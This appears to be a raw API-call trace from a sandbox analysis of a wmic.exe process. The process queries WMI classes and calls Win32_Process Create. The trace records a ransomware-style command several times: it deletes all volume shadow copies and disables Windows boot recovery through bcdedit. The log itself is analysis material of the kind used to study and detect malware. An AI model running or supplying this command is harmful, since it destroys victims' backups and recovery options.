[0172.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0172.606] lstrlenW (lpString="In") returned 2 [0172.606] lstrlenW (lpString="In") returned 2 [0172.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0172.606] SafeArrayGetElement (in: psa=0x236b08, rgIndices=0xcf244, pv=0xcf278 | out: pv=0xcf278) returned 0x0 [0172.606] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0172.606] IUnknown:Release (This=0x75d520) returned 0x1 [0172.606] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.606] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.606] SysStringLen (param_1="CommandLine") returned 0xb [0172.606] SysStringLen (param_1="CommandLine") returned 0xb [0172.606] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.606] IUnknown:Release (This=0x75c4f0) returned 0x1 [0172.606] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcf3e0, pv=0xcf3f0 | out: pv=0xcf3f0) returned 0x0 [0172.606] IWbemClassObject:Get (in: This=0x75cbc0, wszName="ParaId", lFlags=0, pVal=0xcf318*(varType=0x0, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1=0x204eac, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf318*(varType=0x8, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1="ProcessStartupInformation", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] IWbemClassObject:Get (in: This=0x75cbc0, wszName="Type", lFlags=0, pVal=0xcf2f8*(varType=0x0, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1=0x24821c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf2f8*(varType=0x8, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1="OBJECT", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] IWbemClassObject:Get (in: This=0x75cbc0, wszName="Default", lFlags=0, pVal=0xcf338*(varType=0x0, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0 | out: pVal=0xcf338*(varType=0x1, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] ??0CHString@@QAE@XZ () returned 0xcf258 [0172.607] IWbemClassObject:Get (in: This=0x75cbc0, wszName="Qualifiers", lFlags=0, pVal=0xcf1dc*(varType=0x0, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x75c706, varVal2=0xcf23c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1dc*(varType=0x200d, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x236ad8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf23c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] SafeArrayGetLBound (in: psa=0x236ad8, nDim=0x1, plLbound=0xcf218 | out: plLbound=0xcf218) returned 0x0 [0172.607] SafeArrayGetUBound (in: psa=0x236ad8, nDim=0x1, plUbound=0xcf204 | out: plUbound=0xcf204) returned 0x0 [0172.607] SafeArrayGetElement (in: psa=0x236ad8, rgIndices=0xcf240, pv=0xcf250 | out: pv=0xcf250) returned 0x0 [0172.607] IWbemClassObject:Get (in: This=0x75d520, wszName="Name", lFlags=0, pVal=0xcf1ec*(varType=0x0, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1=0x877e52, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1ec*(varType=0x8, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1="In", varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0 [0172.607] IWbemClassObject:Get (in: This=0x75d520, wszName="QualifierValue", lFlags=0, pVal=0xcf1cc*(varType=0x0, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x75c706, varVal2=0xcf1f0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1cc*(varType=0x2008, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x236b08*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x250810, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf1f0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.735] SafeArrayGetLBound (in: psa=0x236b08, nDim=0x1, plLbound=0xcf220 | out: plLbound=0xcf220) returned 0x0 [0172.735] SafeArrayGetUBound (in: psa=0x236b08, nDim=0x1, plUbound=0xcf210 | out: plUbound=0xcf210) returned 0x0 [0172.735] lstrlenW (lpString="CIMTYPE") returned 7 [0172.735] lstrlenW (lpString="In") returned 2 [0172.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0172.735] lstrlenW (lpString="read") returned 4 [0172.735] lstrlenW (lpString="In") returned 2 [0172.735] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0172.736] lstrlenW (lpString="write") returned 5 [0172.736] lstrlenW (lpString="In") returned 2 [0172.736] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0172.736] lstrlenW (lpString="In") returned 2 [0172.736] lstrlenW (lpString="In") returned 2 [0172.736] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0172.736] SafeArrayGetElement (in: psa=0x236b08, rgIndices=0xcf244, pv=0xcf278 | out: pv=0xcf278) returned 0x0 [0172.736] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0172.736] IUnknown:Release (This=0x75d520) returned 0x1 [0172.736] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.736] SysStringLen (param_1="ProcessStartupInformation") returned 0x19 [0172.736] SysStringLen (param_1="CommandLine") returned 0xb [0172.736] SysStringLen (param_1="ProcessStartupInformation") returned 0x19 [0172.736] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.736] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.736] SysStringLen (param_1="ProcessStartupInformation") returned 0x19 [0172.736] IUnknown:Release (This=0x75cbc0) returned 0x1 [0172.736] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcf3e0, pv=0xcf3f0 | out: pv=0xcf3f0) returned 0x0 [0172.736] IWbemClassObject:Get (in: This=0x75d268, wszName="ParaId", lFlags=0, pVal=0xcf318*(varType=0x0, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1=0x24b0a4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf318*(varType=0x8, wReserved1=0x301, wReserved2=0x9b08, wReserved3=0x6ec2, varVal1="ProcessId", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] IWbemClassObject:Get (in: This=0x75d268, wszName="Type", lFlags=0, pVal=0xcf2f8*(varType=0x0, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1=0x24d57c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf2f8*(varType=0x8, wReserved1=0x6ec2, wReserved2=0x4, wReserved3=0x0, varVal1="UINT32", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] IWbemClassObject:Get (in: This=0x75d268, wszName="Default", lFlags=0, pVal=0xcf338*(varType=0x0, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0 | out: pVal=0xcf338*(varType=0x1, wReserved1=0x72, wReserved2=0xf42c, wReserved3=0xc, varVal1=0x77286594, varVal2=0x720138), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] ??0CHString@@QAE@XZ () returned 0xcf258 [0172.737] IWbemClassObject:Get (in: This=0x75d268, wszName="Qualifiers", lFlags=0, pVal=0xcf1dc*(varType=0x0, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x75cdd6, varVal2=0xcf23c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1dc*(varType=0x200d, wReserved1=0x87, wReserved2=0x24, wReserved3=0x0, varVal1=0x236ad8*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x2506e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf23c), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] SafeArrayGetLBound (in: psa=0x236ad8, nDim=0x1, plLbound=0xcf218 | out: plLbound=0xcf218) returned 0x0 [0172.737] SafeArrayGetUBound (in: psa=0x236ad8, nDim=0x1, plUbound=0xcf204 | out: plUbound=0xcf204) returned 0x0 [0172.737] SafeArrayGetElement (in: psa=0x236ad8, rgIndices=0xcf240, pv=0xcf250 | out: pv=0xcf250) returned 0x0 [0172.737] IWbemClassObject:Get (in: This=0x75d520, wszName="Name", lFlags=0, pVal=0xcf1ec*(varType=0x0, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1=0x877e52, varVal2=0x1), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1ec*(varType=0x8, wReserved1=0x47, wReserved2=0xf224, wReserved3=0xc, varVal1="Out", varVal2=0x1), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] IWbemClassObject:Get (in: This=0x75d520, wszName="QualifierValue", lFlags=0, pVal=0xcf1cc*(varType=0x0, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x75cdd6, varVal2=0xcf1f0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1cc*(varType=0x2008, wReserved1=0x47, wReserved2=0x0, wReserved3=0x0, varVal1=0x236b08*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x250810, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0xcf1f0), pType=0x0, plFlavor=0x0) returned 0x0 [0172.737] SafeArrayGetLBound (in: psa=0x236b08, nDim=0x1, plLbound=0xcf220 | out: plLbound=0xcf220) returned 0x0 [0172.737] SafeArrayGetUBound (in: psa=0x236b08, nDim=0x1, plUbound=0xcf210 | out: plUbound=0xcf210) returned 0x0 [0172.737] lstrlenW (lpString="CIMTYPE") returned 7 [0172.737] lstrlenW (lpString="Out") returned 3 [0172.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="CIMTYPE", cchCount2=7) returned 3 [0172.737] lstrlenW (lpString="read") returned 4 [0172.737] lstrlenW (lpString="Out") returned 3 [0172.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="read", cchCount2=4) returned 1 [0172.737] lstrlenW (lpString="write") returned 5 [0172.737] lstrlenW (lpString="Out") returned 3 [0172.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="write", cchCount2=5) returned 1 [0172.737] lstrlenW (lpString="In") returned 2 [0172.737] lstrlenW (lpString="Out") returned 3 [0172.737] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="In", cchCount2=2) returned 3 [0172.737] lstrlenW (lpString="Out") returned 3 [0172.738] lstrlenW (lpString="Out") returned 3 [0172.738] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Out", cchCount1=3, lpString2="Out", cchCount2=3) returned 2 [0172.738] SafeArrayGetElement (in: psa=0x236b08, rgIndices=0xcf244, pv=0xcf278 | out: pv=0xcf278) returned 0x0 [0172.738] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0172.738] IUnknown:Release (This=0x75d520) returned 0x1 [0172.738] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.738] SysStringLen (param_1="ProcessId") returned 0x9 [0172.738] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.738] SysStringLen (param_1="ProcessId") returned 0x9 [0172.738] SysStringLen (param_1="ProcessStartupInformation") returned 0x19 [0172.738] SysStringLen (param_1="CurrentDirectory") returned 0x10 [0172.738] SysStringLen (param_1="ProcessId") returned 0x9 [0172.738] IUnknown:Release (This=0x75d268) returned 0x1 [0172.738] IUnknown:Release (This=0x752e50) returned 0x1 [0172.738] IUnknown:Release (This=0x74fff8) returned 0x0 [0172.739] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.739] lstrlenW (lpString="Create") returned 6 [0172.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", cchCount1=162, lpString2="/", cchCount2=1) returned 3 [0172.739] lstrlenW (lpString="-") returned 1 [0172.739] lstrlenW (lpString="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures") returned 162 [0172.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", cchCount1=162, lpString2="-", cchCount2=1) returned 3 [0172.739] lstrlenW (lpString="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures") returned 162 [0172.739] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0x94f97298*=0x0 | out: _String="Select", _Context=0x94f97298*=0x0) returned="Select" [0172.739] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97298*=0x0 | out: _String=0x0, _Context=0x94f97298*=0x0) returned="*" [0172.739] lstrlenW (lpString="FROM") returned 4 [0172.739] lstrlenW (lpString="*") returned 1 [0172.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0172.739] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97298*=0x0 | out: _String=0x0, _Context=0x94f97298*=0x0) returned="from" [0172.739] lstrlenW (lpString="FROM") returned 4 [0172.739] lstrlenW (lpString="from") returned 4 [0172.739] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0172.739] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f97298*=0x0 | out: _String=0x0, _Context=0x94f97298*=0x0) returned="Win32_Process" [0172.740] lstrlenW (lpString="SET") returned 3 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0172.740] lstrlenW (lpString="CREATE") returned 6 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0172.740] lstrlenW (lpString="LIST") returned 4 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0172.740] lstrlenW (lpString="ASSOC") returned 5 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0172.740] WbemLocator:IUnknown:AddRef (This=0x720828) returned 0x3 [0172.740] lstrlenW (lpString="") returned 0 [0172.740] lstrlenW (lpString="CRH2YWU7") returned 8 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="", cchCount2=0) returned 3 [0172.740] lstrlenW (lpString="CRH2YWU7") returned 8 [0172.740] GetCurrentProcess () returned 0xffffffff [0172.740] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xcfce8 | out: TokenHandle=0xcfce8*=0x280) returned 1 [0172.740] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcfce4 | out: TokenInformation=0x0, ReturnLength=0xcfce4) returned 0 [0172.740] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x762ea8, TokenInformationLength=0x118, ReturnLength=0xcfce4 | out: TokenInformation=0x762ea8, ReturnLength=0xcfce4) returned 1 [0172.740] AdjustTokenPrivileges (in: TokenHandle=0x280, DisableAllPrivileges=0, NewState=0x762ea8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0172.740] CloseHandle (hObject=0x280) returned 1 [0172.740] lstrlenW (lpString="GET") returned 3 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0172.740] lstrlenW (lpString="LIST") returned 4 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0172.740] lstrlenW (lpString="SET") returned 3 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0172.740] lstrlenW (lpString="CALL") returned 4 [0172.740] lstrlenW (lpString="call") returned 4 [0172.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0172.741] ??0CHString@@QAE@XZ () returned 0xcfcac [0172.741] GetCurrentThreadId () returned 0xf7c [0172.741] SysStringLen (param_1="\\\\") returned 0x2 [0172.741] SysStringLen (param_1="CRH2YWU7") returned 0x8 [0172.741] SysStringLen (param_1="\\\\CRH2YWU7") returned 0xa [0172.741] SysStringLen (param_1="\\") returned 0x1 [0172.741] SysStringLen (param_1="\\\\CRH2YWU7\\") returned 0xb [0172.741] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0172.742] WbemLocator:IWbemLocator:ConnectServer (in: This=0x720828, strNetworkResource="\\\\CRH2YWU7\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8bc204 | out: ppNamespace=0x8bc204*=0x72d024) returned 0x0 [0172.812] CoSetProxyBlanket (pProxy=0x72d024, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0172.812] ??1CHString@@QAE@XZ () returned 0x6f950504 [0172.869] ??0CHString@@QAE@XZ () returned 0xcfca8 [0172.869] GetCurrentThreadId () returned 0xf7c [0172.869] lstrlenA (lpString="") returned 0 [0172.870] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0x94f975e4*=0x0 | out: _String="Select", _Context=0x94f975e4*=0x0) returned="Select" [0172.870] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f975e4*=0x0 | out: _String=0x0, _Context=0x94f975e4*=0x0) returned="*" [0172.870] lstrlenW (lpString="FROM") returned 4 [0172.870] lstrlenW (lpString="*") returned 1 [0172.870] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0172.870] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f975e4*=0x0 | out: _String=0x0, _Context=0x94f975e4*=0x0) returned="from" [0172.870] lstrlenW (lpString="FROM") returned 4 [0172.870] lstrlenW (lpString="from") returned 4 [0172.870] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0172.870] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x94f975e4*=0x0 | out: _String=0x0, _Context=0x94f975e4*=0x0) returned="Win32_Process" [0172.870] IWbemServices:GetObject (in: This=0x72d024, strObjectPath="Win32_Process", lFlags=131072, pCtx=0x0, ppObject=0xcfc84*=0x0, ppCallResult=0x0 | out: ppObject=0xcfc84*=0x73f128, ppCallResult=0x0) returned 0x0 [0173.620] IWbemClassObject:GetMethod (in: This=0x73f128, wszName="Create", lFlags=0, ppInSignature=0xcfc9c, ppOutSignature=0xcfc7c | out: ppInSignature=0xcfc9c*=0x740740, ppOutSignature=0xcfc7c*=0x740eb8) returned 0x0 [0173.620] IWbemClassObject:SpawnInstance (in: This=0x740740, lFlags=0, ppNewInstance=0xcfc94 | out: ppNewInstance=0xcfc94*=0x7410b0) returned 0x0 [0173.621] IWbemClassObject:GetNames (in: This=0x740740, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0xcfca4 | out: pNames=0xcfca4*="\x01ƀ\x04") returned 0x0 [0173.621] SafeArrayGetLBound (in: psa=0x236aa8, nDim=0x1, plLbound=0xcfc64 | out: plLbound=0xcfc64) returned 0x0 [0173.621] SafeArrayGetUBound (in: psa=0x236aa8, nDim=0x1, plUbound=0xcfc68 | out: plUbound=0xcfc68) returned 0x0 [0173.621] SafeArrayGetElement (in: psa=0x236aa8, rgIndices=0xcfc88, pv=0xcfcac | out: pv=0xcfcac) returned 0x0 [0173.621] IWbemClassObject:GetPropertyQualifierSet (in: This=0x7410b0, wszProperty="CommandLine", ppQualSet=0xcfb78 | out: ppQualSet=0xcfb78*=0x720868) returned 0x0 [0173.621] IWbemQualifierSet:Get (in: This=0x720868, wszName="CIMTYPE", lFlags=0, pVal=0xcfb1c*(varType=0x0, wReserved1=0x0, wReserved2=0x7e80, wReserved3=0x87, varVal1=0x94f97530, varVal2=0x8730b0), plFlavor=0x0 | out: pVal=0xcfb1c*(varType=0x8, wReserved1=0x0, wReserved2=0x7e80, wReserved3=0x87, varVal1="string", varVal2=0x8730b0), plFlavor=0x0) returned 0x0 [0173.621] IWbemClassObject:Get (in: This=0x7410b0, wszName="CommandLine", lFlags=0, pVal=0xcfaf8*(varType=0x0, wReserved1=0xc9eb, wReserved2=0xfb14, wReserved3=0xc, varVal1=0x877764, varVal2=0x24), pType=0xcfb2c*=850896, plFlavor=0x0 | out: pVal=0xcfaf8*(varType=0x1, wReserved1=0xc9eb, wReserved2=0xfb14, wReserved3=0xc, varVal1=0x877764, varVal2=0x24), pType=0xcfb2c*=8, plFlavor=0x0) returned 0x0 [0173.621] IWbemQualifierSet:Get (in: This=0x720868, wszName="read", lFlags=0, pVal=0xcfb30*(varType=0x0, wReserved1=0x0, wReserved2=0x3510, wReserved3=0x76, varVal1=0xcfb24, varVal2=0xcfb6c), plFlavor=0x0 | out: pVal=0xcfb30*(varType=0x0, wReserved1=0x0, wReserved2=0x3510, wReserved3=0x76, varVal1=0xcfb24, varVal2=0xcfb6c), plFlavor=0x0) returned 0x80041002 [0173.622] IWbemQualifierSet:Get (in: This=0x720868, wszName="write", lFlags=0, pVal=0xcfb30*(varType=0x0, wReserved1=0x0, wReserved2=0x3510, wReserved3=0x76, varVal1=0xcfb24, varVal2=0xcfb6c), plFlavor=0x0 | out: pVal=0xcfb30*(varType=0x0, wReserved1=0x0, wReserved2=0x3510, wReserved3=0x76, varVal1=0xcfb24, varVal2=0xcfb6c), plFlavor=0x0) returned 0x80041002 [0173.622] IWbemQualifierSet:Get (in: This=0x720868, wszName="Description", lFlags=0, pVal=0xcfb0c*(varType=0x0, wReserved1=0x0, wReserved2=0x20, wReserved3=0x0, varVal1=0xcfb48, varVal2=0x877e52), plFlavor=0x0 | out: pVal=0xcfb0c*(varType=0x0, wReserved1=0x0, wReserved2=0x20, wReserved3=0x0, varVal1=0xcfb48, varVal2=0x877e52), plFlavor=0x0) returned 0x80041002 [0173.622] lstrlenA (lpString="Not Available") returned 13 [0173.622] IUnknown:Release (This=0x720868) returned 0x0 [0173.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CommandLine", cchCount1=11, lpString2="CommandLine", cchCount2=11) returned 2 [0173.622] SysStringLen (param_1="In") returned 0x2 [0173.622] SysStringLen (param_1="MaxLen") returned 0x6 [0173.622] lstrlenW (lpString="") returned 0 [0173.622] lstrlenW (lpString="STRING") returned 6 [0173.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0173.622] lstrlenW (lpString="string") returned 6 [0173.622] lstrlenW (lpString="STRING") returned 6 [0173.622] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0173.623] SysStringLen (param_1="In") returned 0x2 [0173.623] SysStringLen (param_1="ValueMap") returned 0x8 [0173.623] SysStringLen (param_1="In") returned 0x2 [0173.623] SysStringLen (param_1="Values") returned 0x6 [0173.623] IWbemClassObject:GetPropertyQualifierSet (in: This=0x7410b0, wszProperty="CommandLine", ppQualSet=0xcfb84 | out: ppQualSet=0xcfb84*=0x720868) returned 0x0 [0173.623] IWbemQualifierSet:Get (in: This=0x720868, wszName="CIMTYPE", lFlags=0, pVal=0xcfb6c*(varType=0x0, wReserved1=0x0, wReserved2=0x75fc, wReserved3=0x94f9, varVal1=0xcf8f8, varVal2=0xcfcb8), plFlavor=0x0 | out: pVal=0xcfb6c*(varType=0x8, wReserved1=0x0, wReserved2=0x75fc, wReserved3=0x94f9, varVal1="string", varVal2=0xcfcb8), plFlavor=0x0) returned 0x0 [0173.623] IWbemClassObject:Get (in: This=0x7410b0, wszName="CommandLine", lFlags=0, pVal=0xcfb5c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xcfb7c*=9111328, plFlavor=0x0 | out: pVal=0xcfb5c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xcfb7c*=8, plFlavor=0x0) returned 0x0 [0173.623] IUnknown:Release (This=0x720868) returned 0x0 [0173.623] lstrlenW (lpString="string") returned 6 [0173.623] lstrlenW (lpString="string") returned 6 [0173.623] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0173.623] IWbemClassObject:Put (This=0x7410b0, wszName="CommandLine", lFlags=0, pVal=0xcfc38*(varType=0x8, wReserved1=0x25, wReserved2=0x6, wReserved3=0x0, varVal1="cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", varVal2=0x6), Type=0) returned 0x0 [0173.624] IUnknown:Release (This=0x740740) returned 0x0 [0173.624] IUnknown:Release (This=0x740eb8) returned 0x0 [0173.624] IUnknown:Release (This=0x73f128) returned 0x0 [0173.624] ??0CHString@@QAE@XZ () returned 0xcfb74 [0173.624] GetCurrentThreadId () returned 0xf7c [0173.624] lstrlenA 